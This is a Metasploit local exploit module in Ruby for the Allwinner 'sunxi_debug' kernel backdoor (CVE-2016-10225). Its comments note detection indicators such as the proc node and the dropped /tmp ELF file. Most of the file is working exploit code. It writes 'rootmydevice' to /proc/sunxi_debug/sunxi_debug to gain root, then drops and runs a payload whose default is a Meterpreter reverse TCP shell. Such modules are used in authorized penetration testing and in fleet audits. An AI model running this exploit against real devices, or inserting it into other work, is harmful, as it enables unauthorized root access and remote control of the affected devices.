modules/exploits/multi/local/allwinner_backdoor.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Local module for the Allwinner "sunxi_debug" kernel debug interface
# (CVE-2016-10225, per the references below).
#
# Defender-relevant summary of what the code in this class touches:
# * it looks for the proc node /proc/sunxi_debug/sunxi_debug on the target;
# * it writes an ELF file named /tmp/<5 random letters>.elf and marks it
#   executable;
# * it writes the string "rootmydevice" to the proc node from a shell and then
#   runs the dropped file from that same shell.
#
# The presence of the proc node is the exposure indicator used by #check, so
# the same path can be used in a fleet audit of affected boards.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Exploit::EXE

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] metadata supplied by the framework or a subclass,
  #   merged with this module's own values by update_info
  def initialize(info = {})
    module_details = {
      'Name' => 'Allwinner 3.4 Legacy Kernel Local Privilege Escalation',
      # The description literal is reproduced exactly as found, including the
      # absence of leading indentation on its lines.
      'Description' => %q{
This module attempts to exploit a debug backdoor privilege escalation in
Allwinner SoC based devices.
Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4.
Vulnerable OS: all OS images available for Orange Pis,
any for FriendlyARM's NanoPi M1,
SinoVoip's M2+ and M3,
Cuebietech's Cubietruck +
Linksprite's pcDuino8 Uno.
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets.
},
      'License' => MSF_LICENSE,
      'Author' => [
        'h00die <mike@stcyrsecurity.com>', # Module
        'KotCzarny' # Discovery
      ],
      'Platform' => [ 'android', 'linux' ],
      'DisclosureDate' => '2016-04-30',
      'DefaultOptions' => {
        'payload' => 'linux/armle/meterpreter/reverse_tcp'
      },
      'Privileged' => true,
      'Arch' => ARCH_ARMLE,
      'References' => [
        [ 'CVE', '2016-10225' ],
        [ 'URL', 'http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/'],
        [
          'URL',
          'https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:' \
          'https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us'
        ],
        [ 'URL', 'http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390']
      ],
      'SessionTypes' => [ 'shell', 'meterpreter' ],
      'Targets' => [
        [ 'Auto', {} ]
      ],
      # ARTIFACTS_ON_DISK corresponds to the ELF file that #exploit writes
      # under /tmp.
      'Notes' => {
        'Reliability' => [ REPEATABLE_SESSION ],
        'Stability' => [ CRASH_SAFE ],
        'SideEffects' => [ ARTIFACTS_ON_DISK ]
      },
      'DefaultTarget' => 0
    }

    super(update_info(info, module_details))
  end

  # Reports whether the debug proc node is present on the target.
  #
  # Only the existence of the path is tested; the kernel version and the
  # writability of the node are not examined here, which is why a hit is
  # reported as "Appears" rather than a stronger result.
  #
  # @return [CheckCode] Appears when the node exists, Safe otherwise
  def check
    debug_node = '/proc/sunxi_debug/sunxi_debug'
    return CheckCode::Safe("Backdoor #{debug_node} not found") unless file_exist?(debug_node)

    CheckCode::Appears("#{debug_node} exists")
  end

  # Drops the generated payload executable and runs it after writing to the
  # debug proc node.
  #
  # Observable traces of a run, as far as this method shows: a new executable
  # file /tmp/<5 random letters>.elf, a chmod on it, and a shell write of
  # "rootmydevice" to the proc node. Nothing in this method removes the file
  # afterwards.
  #
  # @return the result of the final cmd_exec call
  def exploit
    debug_node = '/proc/sunxi_debug/sunxi_debug'
    # Same existence test as #check; abort early when the node is absent.
    unless file_exist?(debug_node)
      fail_with(Failure::NotVulnerable, "Backdoor #{debug_node} not found.")
    end

    payload_exe = generate_payload_exe
    drop_path = "/tmp/#{rand_text_alpha(5)}.elf"
    vprint_good("Backdoor Found, writing payload to #{drop_path}")
    write_file(drop_path, payload_exe)
    cmd_exec("chmod +x #{drop_path}")

    vprint_good('Escalating')
    # Both steps are issued as one command line, so the dropped file is started
    # by the same shell that performed the write to the proc node.
    cmd_exec("echo rootmydevice > #{debug_node}; #{drop_path}")
  end
end